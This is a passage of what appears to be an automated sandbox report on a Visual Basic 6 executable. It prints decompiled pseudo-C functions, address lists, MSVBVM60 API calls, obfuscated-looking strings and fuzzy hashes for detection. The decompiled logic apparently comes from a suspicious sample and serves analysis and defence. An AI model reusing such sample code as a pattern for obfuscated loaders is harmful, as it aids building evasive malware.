					L0040152C();
					_push( &_v156);
					_push( &_v36);
					L00401532();
					_t304 =  &_v76;
					L0040155C();
					_push( &_v120);
					_push( &_v104);
					_push(2);
					L0040153E();
					_t344 = _t344 + 0xc;
				}
				_v96 = 0xe;
				_v104 = 2;
				_push( &_v104);
				_t213 =  &_v120;
				_push(_t213);
				L0040143C();
				_push(L"Out of stri");
				_push(L"ng space");
				L0040147E();
				_v128 = _t213;
				_v136 = 0x8008;
				_push( &_v120);
				_t215 =  &_v136;
				_push(_t215);
				L00401490();
				_v176 = _t215;
				_push( &_v136);
				_push( &_v120);
				_push( &_v104);
				_push(3);
				L0040153E();
				_t345 = _t344 + 0x10;
				_t219 = _v176;
				if(_t219 != 0) {
					if( *0x4134b0 != 0) {
						_v232 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v232 = 0x4134b0;
					}
					_v176 =  *_v232;
					_t266 =  *((intOrPtr*)( *_v176 + 0x4c))(_v176,  &_v76);
					asm("fclex");
					_v180 = _t266;
					if(_v180 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x403ee0);
						_push(_v176);
						_push(_v180);
						L0040158C();
						_v236 = _t266;
					}
					_v184 = _v76;
					_v164 = 0xa3;
					_v172 = 2;
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t272 =  *((intOrPtr*)( *_v184 + 0x1c))(_v184, 0x10,  &_v80);
					asm("fclex");
					_v188 = _t272;
					if(_v188 >= 0) {
						_v240 = _v240 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403f44);
						_push(_v184);
						_push(_v188);
						L0040158C();
						_v240 = _t272;
					}
					_v208 = _v80;
					_t117 =  &_v80;
					 *_t117 = _v80 & 0x00000000;
					_t360 =  *_t117;
					_push(_v208);
					_t219 =  &_v40;
					_push(_t219);
					L00401598();
					_t304 =  &_v76;
					L0040155C();
				}
				asm("fldz");
				_push(_t304);
				_push(_t304);
				 *_t345 = _t368;
				L00401436();
				L004014B4();
				asm("fcomp qword [0x4012a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t360 != 0) {
					if( *0x413010 != 0) {
						_v244 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v244 = 0x413010;
					}
					_t233 =  &_v76;
					L00401598();
					_v192 = _t233;
					_t237 =  *((intOrPtr*)( *_v192 + 0xf0))(_v192,  &_v80, _t233,  *((intOrPtr*)( *((intOrPtr*)( *_v244)) + 0x30c))( *_v244));
					asm("fclex");
					_v196 = _t237;
					if(_v196 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0xf0);
						_push(0x403e24);
						_push(_v192);
						_push(_v196);
						L0040158C();
						_v248 = _t237;
					}
					if( *0x413010 != 0) {
						_v252 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v252 = 0x413010;
					}
					_t241 =  &_v84;
					L00401598();
					_v184 = _t241;
					_t245 =  *((intOrPtr*)( *_v184 + 0x198))(_v184,  &_v68, _t241,  *((intOrPtr*)( *((intOrPtr*)( *_v252)) + 0x308))( *_v252));
					asm("fclex");
					_v188 = _t245;
					if(_v188 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x198);
						_push(0x403aa8);
						_push(_v184);
						_push(_v188);
						L0040158C();
						_v256 = _t245;
					}
					if( *0x413010 != 0) {
						_v260 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v260 = 0x413010;
					}
					_t249 =  &_v88;
					L00401598();
					_v176 = _t249;
					_t253 =  *((intOrPtr*)( *_v176 + 0x150))(_v176,  &_v72, _t249,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x304))( *_v260));
					asm("fclex");
					_v180 = _t253;
					if(_v180 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x403aa8);
						_push(_v176);
						_push(_v180);
						L0040158C();
						_v264 = _t253;
					}
					_push(0);
					_push(0);
					_push(_v80);
					_t254 =  &_v104;
					_push(_t254);
					L00401574();
					_push(_t254);
					L0040157A();
					_t255 =  ~_t254;
					_push(_t255);
					_push(_v68);
					_push(_v72);
					_push(0);
					L00401430();
					_v32 = _t255;
					_push( &_v68);
					_push( &_v72);
					_push(2);
					L0040156E();
					_push( &_v88);
					_push( &_v84);
					_push( &_v80);
					_t219 =  &_v76;
					_push(_t219);
					_push(4);
					L00401568();
					_t345 = _t345 + 0x30;
					L00401562();
				}
				_push(0x404228);
				_push(0x403ff0);
				L0040147E();
				L00401508();
				_push(2);
				_push(_v24);
				L0040142A();
				L00401508();
				_push(_t219);
				_push(0x403ff0);
				L00401478();
				asm("sbb eax, eax");
				_v176 =  ~( ~( ~_t219));
				L00401538();
				if(_v176 != 0) {
					_push(L"ADVISABLY");
					_push(0x60);
					_push(0xffffffff);
					_push(0x20);
					L004014E4();
				}
				_v96 = 2;
				_v104 = 2;
				_push( &_v104);
				_push( &_v120);
				L00401424();
				_push( &_v120);
				L004014D2();
				L00401508();
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L0040153E();
				asm("wait");
				_push(0x411185);
				L00401538();
				L00401538();
				_t229 =  &_v36;
				_push(_t229);
				_push(0);
				L004014C0();
				L0040155C();
				L00401538();
				L00401562();
				L00401538();
				return _t229;
			}

0x00410991
0x0041099c
0x0041099d
0x004109a9
0x004109b1
0x004109b4
0x004109c1
0x004109cc
0x004109d1
0x004109d4
0x004109d5
0x004109da
0x004109dd
0x004109e0
0x004109e5
0x004109e7
0x004109e9
0x004109eb
0x004109f5
0x004109ff
0x00410a05
0x00410a12
0x00410a34
0x00410a14
0x00410a14
0x00410a19
0x00410a1e
0x00410a21
0x00410a27
0x00410a2c
0x00410a2c
0x00410a12
0x00410a3b
0x00410a40
0x00410a45
0x00410a46
0x00410a47
0x00410a4d
0x00410a54
0x00410a61
0x00410a7e
0x00410a63
0x00410a63
0x00410a68
0x00410a6d
0x00410a72
0x00410a72
0x00410aa2
0x00410aa6
0x00410aab
0x00410ac3
0x00410ac9
0x00410acb
0x00410ad8
0x00410afd
0x00410ada
0x00410ada
0x00410adf
0x00410ae4
0x00410aea
0x00410af0
0x00410af5
0x00410af5
0x00410b0b
0x00410b28
0x00410b0d
0x00410b0d
0x00410b12
0x00410b17
0x00410b1c
0x00410b1c
0x00410b3a
0x00410b43
0x00410b49
0x00410b53
0x00410b56
0x00410b5d
0x00410b67
0x00410b78
0x00410b82
0x00410b83
0x00410b84
0x00410b85
0x00410b89
0x00410b96
0x00410b97
0x00410b98
0x00410b99
0x00410ba8
0x00410bab
0x00410bad
0x00410bba
0x00410bdc
0x00410bbc
0x00410bbc
0x00410bbe
0x00410bc3
0x00410bc9
0x00410bcf
0x00410bd4
0x00410bd4
0x00410be6
0x00410bed
0x00410bee
0x00410bf9
0x00410bfd
0x00410bfe
0x00410c03
0x00410c06
0x00410c0e
0x00410c12
0x00410c13
0x00410c15
0x00410c1a
0x00410c1a
0x00410c1d
0x00410c24
0x00410c2e
0x00410c2f
0x00410c32
0x00410c33
0x00410c38
0x00410c3d
0x00410c42
0x00410c47
0x00410c4a
0x00410c57
0x00410c58
0x00410c5e
0x00410c5f
0x00410c64
0x00410c71
0x00410c75
0x00410c79
0x00410c7a
0x00410c7c
0x00410c81
0x00410c84
0x00410c8d
0x00410c9a
0x00410cb7
0x00410c9c
0x00410c9c
0x00410ca1
0x00410ca6
0x00410cab
0x00410cab
0x00410cc9
0x00410ce1
0x00410ce4
0x00410ce6
0x00410cf3
0x00410d15
0x00410cf5
0x00410cf5
0x00410cf7
0x00410cfc
0x00410d02
0x00410d08
0x00410d0d
0x00410d0d
0x00410d1f
0x00410d25
0x00410d2f
0x00410d40
0x00410d4d
0x00410d4e
0x00410d4f
0x00410d50
0x00410d5f
0x00410d62
0x00410d64
0x00410d71
0x00410d93
0x00410d73
0x00410d73
0x00410d75
0x00410d7a
0x00410d80
0x00410d86
0x00410d8b
0x00410d8b
0x00410d9d
0x00410da3
0x00410da3
0x00410da3
0x00410da7
0x00410dad
0x00410db0
0x00410db1
0x00410db6
0x00410db9
0x00410db9
0x00410dbe
0x00410dc0
0x00410dc1
0x00410dc2
0x00410dc5
0x00410dca
0x00410dcf
0x00410dd5
0x00410dd7
0x00410dd8
0x00410de5
0x00410e02
0x00410de7
0x00410de7
0x00410dec
0x00410df1
0x00410df6
0x00410df6
0x00410e26
0x00410e2a
0x00410e2f
0x00410e47
0x00410e4d
0x00410e4f
0x00410e5c
0x00410e81
0x00410e5e
0x00410e5e
0x00410e63
0x00410e68
0x00410e6e
0x00410e74
0x00410e79
0x00410e79
0x00410e8f
0x00410eac
0x00410e91
0x00410e91
0x00410e96
0x00410e9b
0x00410ea0
0x00410ea0
0x00410ed0
0x00410ed4
0x00410ed9
0x00410ef1
0x00410ef7
0x00410ef9
0x00410f06
0x00410f2b
0x00410f08
0x00410f08
0x00410f0d
0x00410f12
0x00410f18
0x00410f1e
0x00410f23
0x00410f23
0x00410f39
0x00410f56
0x00410f3b
0x00410f3b
0x00410f40
0x00410f45
0x00410f4a
0x00410f4a
0x00410f7a
0x00410f7e
0x00410f83
0x00410f9b
0x00410fa1
0x00410fa3
0x00410fb0
0x00410fd5
0x00410fb2
0x00410fb2
0x00410fb7
0x00410fbc
0x00410fc2
0x00410fc8
0x00410fcd
0x00410fcd
0x00410fdc
0x00410fde
0x00410fe0
0x00410fe3
0x00410fe6
0x00410fe7
0x00410fef
0x00410ff0
0x00410ff5
0x00410ff7
0x00410ff8
0x00410ffb
0x00410ffe
0x00411000
0x00411005
0x0041100b
0x0041100f
0x00411010
0x00411012
0x0041101d
0x00411021
0x00411025
0x00411026
0x00411029
0x0041102a
0x0041102c
0x00411031
0x00411037
0x00411037
0x0041103c
0x00411041
0x00411046
0x00411050
0x00411055
0x00411057
0x0041105a
0x00411064
0x00411069
0x0041106a
0x0041106f
0x00411076
0x0041107c
0x00411086
0x00411094
0x00411096
0x0041109b
0x0041109d
0x0041109f
0x004110a1
0x004110a1
0x004110a6
0x004110ad
0x004110b7
0x004110bb
0x004110bc
0x004110c4
0x004110c5
0x004110cf
0x004110d7
0x004110db
0x004110dc
0x004110de
0x004110e6
0x004110e7
0x0041114c
0x00411154
0x00411159
0x0041115c
0x0041115d
0x0041115f
0x00411167
0x0041116f
0x00411177
0x0041117f
0x00411184

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 004109A9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401346), ref: 004109C1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401346), ref: 004109CC
#546.MSVBVM60(?,?,?,?,?,00401346), ref: 004109D5
__vbaVarMove.MSVBVM60(?,?,?,?,?,00401346), ref: 004109E0
#588.MSVBVM60(00000002,00000001,00000000,?,?,?,?,?,00401346), ref: 004109EB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402478,00000708), ref: 00410A27
__vbaCyStr.MSVBVM60(004041EC,00000002,00000001,00000000,?,?,?,?,?,00401346), ref: 00410A40
__vbaFpCmpCy.MSVBVM60(00000000,?,004041EC,00000002,00000001,00000000,?,?,?,?,?,00401346), ref: 00410A4D
__vbaNew2.MSVBVM60(00401DE0,00413010,00000000,?,004041EC,00000002,00000001,00000000,?,?,?,?,?,00401346), ref: 00410A6D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410AA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,000000F0), ref: 00410AF0
__vbaNew2.MSVBVM60(00403EF0,004134B0), ref: 00410B17
__vbaChkstk.MSVBVM60(?), ref: 00410B78
__vbaChkstk.MSVBVM60(?), ref: 00410B89
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000038), ref: 00410BCF
__vbaVar2Vec.MSVBVM60(?,?), ref: 00410BEE
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00410BFE
__vbaFreeObj.MSVBVM60(?,?,?,?), ref: 00410C06
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?), ref: 00410C15
#652.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,00000000,?,004041EC), ref: 00410C33
__vbaStrCat.MSVBVM60(ng space,Out of stri,?,00000002,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410C42
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,ng space,Out of stri,?,00000002), ref: 00410C5F
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00008008,00008008,?,?,?,?,?,ng space,Out of stri,?,00000002), ref: 00410C7C
__vbaNew2.MSVBVM60(00403EF0,004134B0), ref: 00410CA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,0000004C), ref: 00410D08
__vbaChkstk.MSVBVM60(?), ref: 00410D40
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F44,0000001C), ref: 00410D86
__vbaObjSet.MSVBVM60(?,?), ref: 00410DB1
__vbaFreeObj.MSVBVM60(?,?), ref: 00410DB9
#584.MSVBVM60(?,?,?,?), ref: 00410DC5
__vbaFpR8.MSVBVM60(?,?,?,?), ref: 00410DCA
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 00410DF1
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410E2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,000000F0), ref: 00410E74
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 00410E9B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410ED4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000198), ref: 00410F1E
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 00410F45
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410F7E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000150), ref: 00410FC8
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00410FE7
__vbaI4Var.MSVBVM60(00000000), ref: 00410FF0
__vbaInStr.MSVBVM60(00000000,?,?,00000000,00000000), ref: 00411000
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,00000000,00000000), ref: 00411012
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,00000000,00000000), ref: 0041102C
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00000000,00000000), ref: 00411037
__vbaStrCat.MSVBVM60(00403FF0,00404228), ref: 00411046
__vbaStrMove.MSVBVM60(00403FF0,00404228), ref: 00411050
#514.MSVBVM60(?,00000002,00403FF0,00404228), ref: 0041105A
__vbaStrMove.MSVBVM60(?,00000002,00403FF0,00404228), ref: 00411064
__vbaStrCmp.MSVBVM60(00403FF0,00000000,?,00000002,00403FF0,00404228), ref: 0041106F
__vbaFreeStr.MSVBVM60(00403FF0,00000000,?,00000002,00403FF0,00404228), ref: 00411086
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000060,ADVISABLY,00403FF0,00000000,?,00000002,00403FF0,00404228), ref: 004110A1
#613.MSVBVM60(?,00000002), ref: 004110BC
__vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 004110C5
__vbaStrMove.MSVBVM60(?,?,00000002), ref: 004110CF
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002), ref: 004110DE
__vbaFreeStr.MSVBVM60(00411185,00404228), ref: 0041114C
__vbaFreeStr.MSVBVM60(00411185,00404228), ref: 00411154
__vbaAryDestruct.MSVBVM60(00000000,00411185,00411185,00404228), ref: 0041115F
__vbaFreeObj.MSVBVM60(00000000,00411185,00411185,00404228), ref: 00411167

Strings

ADVISABLY, xrefs: 00411096
ng space, xrefs: 00410C3D
Out of stri, xrefs: 00410C38

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$List$Chkstk$Copy$#514#546#584#588#613#652CallDestructFileLateOpenVar2
String ID: ADVISABLY$Out of stri$ng space
API String ID: 3486018356-2785891538
Opcode ID: b9ca54c170aabef253b068f4d42b3bcbbeea09204c932bca85364b275724548c
Instruction ID: 00889f18cd9615fc269a35594269b7dfef0f0470084fd2557684875807c0c52b
Opcode Fuzzy Hash: b9ca54c170aabef253b068f4d42b3bcbbeea09204c932bca85364b275724548c
Instruction Fuzzy Hash: 4B222A71940218EFDB20EF91CC45FDDB7B9AF08305F1045AAE10ABB1A1DBB85A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00411198, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00411198(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v68;
				char* _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _t128;
				signed int _t132;
				signed int _t137;
				char* _t138;
				signed int _t142;
				signed int _t146;
				char* _t150;
				signed int _t154;
				signed int _t157;
				signed int _t162;
				signed int _t166;
				intOrPtr _t182;
				void* _t195;
				void* _t197;
				intOrPtr* _t198;
				char _t212;

				_t198 = _t197 - 0xc;
				 *[fs:0x0] = _t198;
				L00401340();
				_v16 = _t198;
				_v12 = 0x4012c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401346, _t195);
				L00401556();
				_t128 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v44);
				asm("fclex");
				_v160 = _t128;
				if(_v160 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0xa8);
					_push(0x402448);
					_push(_a4);
					_push(_v160);
					L0040158C();
					_v188 = _t128;
				}
				_push(_v44);
				_push(0);
				L00401478();
				asm("sbb eax, eax");
				_v164 =  ~( ~_t128 + 1);
				L00401538();
				_t132 = _v164;
				if(_t132 != 0) {
					_push(0x31);
					L004014CC();
					_v32 = _t132;
				}
				_push(0x4041b0);
				L0040141E();
				if(_t132 != 0x61) {
					_v92 = L"Fedteprinsens";
					_v100 = 8;
					if( *0x413010 != 0) {
						_v192 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v192 = 0x413010;
					}
					_t162 =  &_v48;
					L00401598();
					_v160 = _t162;
					_t166 =  *((intOrPtr*)( *_v160 + 0x60))(_v160,  &_v152, _t162,  *((intOrPtr*)( *((intOrPtr*)( *_v192)) + 0x300))( *_v192));
					asm("fclex");
					_v164 = _t166;
					if(_v164 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403c78);
						_push(_v160);
						_push(_v164);
						L0040158C();
						_v196 = _t166;
					}
					_v124 = _v152;
					_v132 = 3;
					_push(0x10);
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t132 = 0x10;
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"MVGW2MmrhdWkYgC6ur9yhXfzp8fjm8VnZWJz60");
					_push(_v28);
					L00401418();
					_t198 = _t198 + 0x2c;
					L0040155C();
				}
				_push(0x4042bc);
				_push(0x4042c4);
				L0040147E();
				L00401508();
				_v92 =  &_v40;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L00401412();
				_v108 = 0x4042bc;
				_v116 = 0x8008;
				_push( &_v68);
				_t137 =  &_v116;
				_push(_t137);
				L00401490();
				_v160 = _t137;
				L00401562();
				_t138 = _v160;
				if(_t138 != 0) {
					if( *0x413010 != 0) {
						_v200 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v200 = 0x413010;
					}
					_t142 =  &_v48;
					L00401598();
					_v160 = _t142;
					_t146 =  *((intOrPtr*)( *_v160 + 0x1c0))(_v160,  &_v152, _t142,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x304))( *_v200));
					asm("fclex");
					_v164 = _t146;
					if(_v164 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x403aa8);
						_push(_v160);
						_push(_v164);
						L0040158C();
						_v204 = _t146;
					}
					if( *0x413010 != 0) {
						_v208 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v208 = 0x413010;
					}
					_t182 =  *((intOrPtr*)( *_v208));
					_t150 =  &_v52;
					L00401598();
					_v168 = _t150;
					_t154 =  *((intOrPtr*)( *_v168 + 0x68))(_v168,  &_v156, _t150,  *((intOrPtr*)(_t182 + 0x30c))( *_v208));
					asm("fclex");
					_v172 = _t154;
					if(_v172 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403e24);
						_push(_v168);
						_push(_v172);
						L0040158C();
						_v212 = _t154;
					}
					L00401526();
					asm("fild dword [ebp-0x98]");
					_v216 =  *0x4012c0;
					_t212 = _v216;
					_v132 = _t212;
					asm("fild dword [ebp-0x94]");
					_v220 = _t212;
					 *_t198 = _v220;
					 *_t198 =  *0x4012bc;
					 *_t198 =  *0x4012b8;
					_t157 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t182, _t182, _t182, _t182, _t154);
					asm("fclex");
					_v176 = _t157;
					if(_v176 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x402448);
						_push(_a4);
						_push(_v176);
						L0040158C();
						_v224 = _t157;
					}
					_push( &_v52);
					_t138 =  &_v48;
					_push(_t138);
					_push(2);
					L00401568();
				}
				asm("wait");
				_push(0x41162d);
				L0040155C();
				L00401538();
				L00401538();
				return _t138;
			}

0x0041119b
0x004111aa
0x004111b6
0x004111be
0x004111c1
0x004111c8
0x004111d7
0x004111e0
0x004111f1
0x004111f7
0x004111f9
0x00411206
0x00411228
0x00411208
0x00411208
0x0041120d
0x00411212
0x00411215
0x0041121b
0x00411220
0x00411220
0x0041122f
0x00411232
0x00411234
0x0041123b
0x00411240
0x0041124a
0x0041124f
0x00411258
0x0041125a
0x0041125c
0x00411261
0x00411261
0x00411264
0x00411269
0x00411272
0x00411278
0x0041127f
0x0041128d
0x004112aa
0x0041128f
0x0041128f
0x00411294
0x00411299
0x0041129e
0x0041129e
0x004112ce
0x004112d2
0x004112d7
0x004112f2
0x004112f5
0x004112f7
0x00411304
0x00411326
0x00411306
0x00411306
0x00411308
0x0041130d
0x00411313
0x00411319
0x0041131e
0x0041131e
0x00411333
0x00411336
0x0041133d
0x00411340
0x0041134a
0x0041134b
0x0041134c
0x0041134d
0x00411350
0x00411351
0x0041135b
0x0041135c
0x0041135d
0x0041135e
0x0041135f
0x00411361
0x00411366
0x00411369
0x0041136e
0x00411374
0x00411374
0x00411379
0x0041137e
0x00411383
0x0041138d
0x00411395
0x00411398
0x004113a2
0x004113a6
0x004113a7
0x004113ac
0x004113b3
0x004113bd
0x004113be
0x004113c1
0x004113c2
0x004113c7
0x004113d1
0x004113d6
0x004113df
0x004113ec
0x00411409
0x004113ee
0x004113ee
0x004113f3
0x004113f8
0x004113fd
0x004113fd
0x0041142d
0x00411431
0x00411436
0x00411451
0x00411457
0x00411459
0x00411466
0x0041148b
0x00411468
0x00411468
0x0041146d
0x00411472
0x00411478
0x0041147e
0x00411483
0x00411483
0x00411499
0x004114b6
0x0041149b
0x0041149b
0x004114a0
0x004114a5
0x004114aa
0x004114aa
0x004114d0
0x004114da
0x004114de
0x004114e3
0x004114fe
0x00411501
0x00411503
0x00411510
0x00411532
0x00411512
0x00411512
0x00411514
0x00411519
0x0041151f
0x00411525
0x0041152a
0x0041152a
0x0041153f
0x00411545
0x0041154b
0x00411551
0x00411558
0x0041155b
0x00411561
0x0041156e
0x00411578
0x00411582
0x0041158f
0x00411595
0x00411597
0x004115a4
0x004115c6
0x004115a6
0x004115a6
0x004115ab
0x004115b0
0x004115b3
0x004115b9
0x004115be
0x004115be
0x004115d0
0x004115d1
0x004115d4
0x004115d5
0x004115d7
0x004115dc
0x004115df
0x004115e0
0x00411617
0x0041161f
0x00411627
0x0041162c

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 004111B6
__vbaStrCopy.MSVBVM60(?,?,?,?,00401346), ref: 004111E0
__vbaHresultCheckObj.MSVBVM60(00000000,004012C8,00402448,000000A8), ref: 0041121B
__vbaStrCmp.MSVBVM60(00000000,?), ref: 00411234
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041124A
#569.MSVBVM60(00000031,00000000,?), ref: 0041125C
#696.MSVBVM60(004041B0,00000000,?), ref: 00411269
__vbaNew2.MSVBVM60(00401DE0,00413010,004041B0,00000000,?), ref: 00411299
__vbaObjSet.MSVBVM60(?,00000000), ref: 004112D2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C78,00000060), ref: 00411319
__vbaChkstk.MSVBVM60(00000000,00000000,00403C78,00000060), ref: 00411340
__vbaChkstk.MSVBVM60(00000000,00000000,00403C78,00000060), ref: 00411351
__vbaLateMemCall.MSVBVM60(?,MVGW2MmrhdWkYgC6ur9yhXfzp8fjm8VnZWJz60,00000002), ref: 00411369
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401346), ref: 00411374
__vbaStrCat.MSVBVM60(004042C4,004042BC,004041B0,00000000,?), ref: 00411383
__vbaStrMove.MSVBVM60(004042C4,004042BC,004041B0,00000000,?), ref: 0041138D
#524.MSVBVM60(?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 004113A7
__vbaVarTstNe.MSVBVM60(00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 004113C2
__vbaFreeVar.MSVBVM60(00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 004113D1
__vbaNew2.MSVBVM60(00401DE0,00413010,00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 004113F8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411431
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AA8,000001C0), ref: 0041147E
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 004114A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004114DE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,00000068), ref: 00411525
__vbaFpI4.MSVBVM60(00000000,?,00403E24,00000068), ref: 0041153F
__vbaHresultCheckObj.MSVBVM60(00000000,004012C8,00402448,000002C8,?,?,?,?,00000000), ref: 004115B9
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00000000), ref: 004115D7
__vbaFreeObj.MSVBVM60(0041162D,00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 00411617
__vbaFreeStr.MSVBVM60(0041162D,00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 0041161F
__vbaFreeStr.MSVBVM60(0041162D,00008008,?,?,00004008,004042C4,004042BC,004041B0,00000000,?), ref: 00411627

Strings

Fedteprinsens, xrefs: 00411278
MVGW2MmrhdWkYgC6ur9yhXfzp8fjm8VnZWJz60, xrefs: 00411361

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#524#569#696CallCopyLateListMove
String ID: Fedteprinsens$MVGW2MmrhdWkYgC6ur9yhXfzp8fjm8VnZWJz60
API String ID: 2339431472-3403953030
Opcode ID: b43a088f8c994ea722a31c71f53f116abfec8222b7489632030f712653d42b44
Instruction ID: 74aea99b158614edda37b50bfa0c7019cb1f78d1ef7b85e1ca6b75c50615aa7f
Opcode Fuzzy Hash: b43a088f8c994ea722a31c71f53f116abfec8222b7489632030f712653d42b44
Instruction Fuzzy Hash: 13C10670A00218EFDB10EFA1CC45BDDBBB5BF48305F1045AAE549BB1A1C7785A84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041164C, Relevance: 40.8, APIs: 27, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041164C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				long long* _v12;
				char _v24;
				signed int _v28;
				intOrPtr _v40;
				char _v52;
				char _v60;
				void* _v64;
				signed int _v68;
				void* _v72;
				signed char _v80;
				char _v88;
				signed char _v96;
				char _v104;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int* _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed long long _v192;
				signed int _v196;
				signed int* _v200;
				signed int _v204;
